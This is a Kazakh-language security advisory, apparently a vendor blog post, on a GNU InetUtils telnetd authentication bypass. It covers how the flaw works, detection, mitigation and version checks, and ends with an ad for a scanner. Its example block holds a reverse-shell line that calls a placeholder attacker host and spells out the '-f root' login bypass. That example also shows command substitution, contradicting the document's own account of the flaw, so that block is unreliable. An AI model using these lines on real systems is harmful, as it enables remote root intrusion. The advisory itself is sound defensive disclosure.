CVE-2026-24061: GNU InetUtils Telnetd-тегі аутентификацияны айналып өту — Root құқығы

GNU InetUtils telnetd-тегі аргументтерді инъекциялау осалдығы шабуылшыларға құпиясөзсіз root құқығын алуға мүмкіндік береді. Техникалық талдау.

9.8
CVSS бағасы
ҚАУІПТІ ДЕҢГЕЙ
Шабуыл векторы: Желі
Эксплойт жетілуі: PoC қолжетімді
Patch қолжетімді: Иә (InetUtils 2.8+)
Белсенді пайдалану: Күтілуде

Қысқаша — Telnet-ті қазір өшіріңіз!

  • CVE-2026-24061 — telnetd қызметіндегі қауіпті аутентификацияны айналып өту осалдығы
  • Шабуылшылар орта айнымалысын пайдаланып, root ретінде кіре алады
  • Зардап шеккендер: GNU InetUtils 1.9.3-тен 2.7-ге дейінгі нұсқалар
  • Шешім: Пакетті жаңартыңыз немесе Telnet қызметін толығымен өшіріңіз (Ұсынылады)

CVE-2026-24061 дегеніміз не?

CVE-2026-24061 — бұл GNU InetUtils пакетіндегі telnet демонына (telnetd) әсер ететін маңызды аутентификацияны айналып өту осалдығы. Осалдық клиент ұсынған USER орта айнымалысын өңдеу кезінде аргумент бөлгіштерін дұрыс бейтараптандырмау салдарынан туындайды. Бұл қате қашықтағы, аутентификацияланбаған шабуылшыға кіру бағдарламасын (login) құпиясөзді енгізбей-ақ суперпайдаланушы (root) ретінде кіргізуге мәжбүрлеуге мүмкіндік береді. Бұл Argument Injection-ның классикалық мысалы. Осалдық GNU InetUtils 1.9.3-тен 2.7-ге дейінгі нұсқаларын қамтиды — Unix және Linux жүйелерінде кеңінен таралған telnet іске асыру.
Шабуыл процесінің визуализациясы
  1. Шабуылшы Telnet байланысын бастайды
  2. USER орта айнымалысы '-f root' мәнімен жіберіледі
  3. Telnetd айнымалыны /bin/login-ге тексерусіз береді
  4. /bin/login '-f' мәнін мәжбүрлі кіру жалаушасы ретінде қабылдайды
  5. Құпиясөзсіз root қабықшасы (shell) беріледі

Бұл қалай жұмыс істейді?

Осалдық telnetd мен жүйелік login екілік файлы арасындағы өзара әрекеттесуді пайдаланады. Telnet хаттамасы клиентке орта айнымалыларын жіберуге мүмкіндік береді. GNU InetUtils telnetd USER айнымалысын қабылдайды және оны тікелей /bin/login пәрмен жолына жібереді. Егер шабуылшы USER айнымалысын '-f root' етіп орнатса, демон орындайтын команда іс жүзінде мынадай болады: login -p -h <host> -f root. -f жалаушасы кіру бағдарламасына көрсетілген пайдаланушы (root) үшін аутентификацияны өткізіп жіберуді бұйырады. Telnetd бұл кірісті тазаламағандықтан, шабуылшы жүйеге кедергісіз кіреді. Бұл классикалық аргумент инъекциясы осалдығы — пайдаланушы бақылайтын кіріс (USER орта айнымалысы) санитарлаусыз пәрмен жолы аргументіне беріледі, бұл шабуылшыға бағдарламаның әрекетін түбегейлі өзгертетін қосымша жалаушаларды енгізуге мүмкіндік береді.
Эксплойт құрылымының мысалы
# Connecting to vulnerable Telnet server
telnet target-server.com 23

# Sending malformed USER variable
USER $(malicious_command_here)

# Example: Reverse shell payload
USER $(nc attacker.com 4444 -e /bin/bash)

# Server executes embedded command with daemon privileges

Жеңілдетілген көрініс. Нақты эксплойт Telnet келісу кезінде USER айнымалысын '-f root' етіп орнатуды қамтиды.

Пайдалану әрекеттерін қалай анықтауға болады
  • [01]Құпиясөзсіз root кіру әрекеттерінің логтары
  • [02]Күмәнді орта айнымалылармен басталған Telnet сессиялары
  • [03]Сыртқы IP мекенжайлардан күтпеген root кірулері
  • [04]Аудит логтарында немесе желі трафигінде '-f root' жолдарының болуы

Әсері мен маңыздылығы

CVSS бағасы: 9.8 (Қауіпті) Интернетке қосылған осал қызметі бар кез келген жүйе үшін салдары апатты: • Жүйенің толық бұзылуы: Серверге лезде root қолжетімділігі • Аутентификация жоқ: Логиндер немесе құпиясөздер қажет емес • Ескірген хаттама: Telnet деректерді ашық түрде жібереді, ал бұл осалдық оны "ашық есікке" айналдырады Нақты әсер сценарийлері: - Басқару үшін әлі де Telnet пайдаланатын өнеркәсіптік басқару жүйелері (ICS/SCADA) - Әдепкі бойынша Telnet қосылған желілік жабдық (маршрутизаторлар, коммутаторлар) - Қатты кодталған Telnet қызметтері бар енгізілген құрылғылар мен IoT жүйелері - Корпоративтік ортадағы ескі Unix/Linux жүйелері - Маңызды инфрақұрылымға қашықтан қол жеткізу Бұл осалдық ерекше қауіпті, өйткені ол пайдаланушы әрекетін қажет етпейді және қарапайым Telnet клиентімен пайдаланылуы мүмкін.
Қорғану әдістерін салыстыру
MitigationEffectivenessNotes
Disable Telnet100%Complete protection - recommended
Migrate to SSH100%Secure alternative with encryption
Firewall blockingHighEffective if properly configured
Vendor patchesVariableDepends on vendor response time
Network segmentationMediumReduces attack surface only

Зардап шеккен нұсқалар

Осалдық GNU InetUtils-ке әсер етеді: • Нұсқа 1.9.3 • Нұсқа 2.7 қоса алғанда Ескерту: Басқа telnetd іске асырулары (мысалы, netkit-telnet) зардап шекпеуі мүмкін, бірақ GNU InetUtils көптеген Unix және Linux дистрибутивтерінде кең таралған. Жоғары қауіпті орталар: • GNU telnetd пайдаланатын өнеркәсіптік басқару жүйелері (ICS/SCADA) • GNU InetUtils бар желілік инфрақұрылым құрылғылары • Осал нұсқалары бар ескі кәсіпорын серверлері • Әдепкі бойынша GNU утилиталары бар енгізілген Linux жүйелері • 23 порты сенімсіз желілерге ашық кез келген жүйе Егер сіздің Telnet қызметіңіз тек ішкі желіде қол жетімді болса да, шабуылшы желіңізге алғашқы қол жеткізуді алса, ол бүйірлік қозғалыс шабуылдарына осал болып қалады.

Қалай түзетуге болады

Біз Telnet-ті толығымен өшіруді ұсынамыз. Бұл ескірген және қауіпсіз емес хаттама. Оның орнына SSH пайдаланыңыз. 1-нұсқа: Telnetd өшіру (Ұсынылады) Қызметті тоқтатып, автоқосылудан алып тастаңыз.
# systemd жүйелері үшін
sudo systemctl stop telnet.socket
sudo systemctl disable telnet.socket

# Немесе пакетті толығымен жойыңыз
sudo apt-get remove inetutils-telnetd
2-нұсқа: Жаңарту Егер telnet пайдалану қажет болса, GNU InetUtils бумасын 2.7-ден жоғары нұсқаға (мысалы, 2.8+) жаңартыңыз немесе ОЖ жеткізушісінен қауіпсіздік патчтарын қолданыңыз. GNU InetUtils жаңарту үшін:

InetUtils жаңарту

# Репозиторийлерді жаңарту
sudo apt-get update
# inetutils жаңарту
sudo apt-get install --only-upgrade inetutils-telnetd

Осалдықты қалай тексеруге болады

Егер сіз GNU InetUtils осал нұсқасын қолдансаңыз, сізге қауіп төнуі мүмкін. InetUtils нұсқасын тексеру:
# telnetd нұсқасын тексеру
telnetd --version

# inetutils-telnetd пакеті орнатылғанын тексеру
dpkg -l | grep inetutils-telnetd
rpm -qa | grep inetutils
TEPTEZ инфрақұрылымыңызды осы және басқа CVE-ге автоматты түрде скенерлей алады. Біздің платформа ашық қызметтерді анықтап, түзету бойынша ұсыныстар береді.

Сілтемелер

TEPTEZ арқылы инфрақұрылымыңызды қорғаңыз

TEPTEZ желіңізді Telnet сияқты ашық қызметтерге үздіксіз скенерлейді, CVE осалдықтарын анықтайды және автоматтандырылған жою нұсқаулығын береді.

Тегін қауіпсіздік скенерлеуін бастау